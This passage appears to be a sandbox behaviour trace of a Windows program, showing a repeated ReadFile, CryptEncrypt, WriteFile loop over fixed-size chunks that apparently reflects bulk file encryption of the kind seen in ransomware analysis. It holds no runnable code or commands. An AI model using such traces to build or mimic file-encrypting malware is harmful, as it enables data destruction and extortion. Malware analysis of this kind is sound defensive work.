lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.070] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.070] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.070] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.070] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.070] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.070] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.070] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.070] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.070] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.070] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.071] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.071] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.071] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.071] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.071] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.071] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.071] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.071] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.071] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.071] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.071] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.071] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.072] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.072] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.072] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.072] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.072] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.072] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.072] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.072] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.072] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.072] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.072] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.072] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.072] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.073] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.073] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.073] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.073] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.073] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.073] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.073] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.073] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.073] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.073] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.073] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.073] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.074] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.074] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.074] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.074] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.074] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.074] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.074] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.074] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.074] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.074] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.074] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.074] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.075] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.075] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.075] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.075] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.075] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.075] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.075] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.075] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.075] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.075] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.075] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.075] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.076] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.076] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.076] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.076] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.076] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.076] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.076] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.076] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.076] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.076] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.076] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.076] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.076] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.076] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.076] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.077] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.077] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.077] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.077] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.077] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.077] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.077] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.077] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.077] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.077] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.077] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.077] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.077] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.077] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.078] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.078] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.078] CryptEncrypt (in: hKey=0x28e82b8, 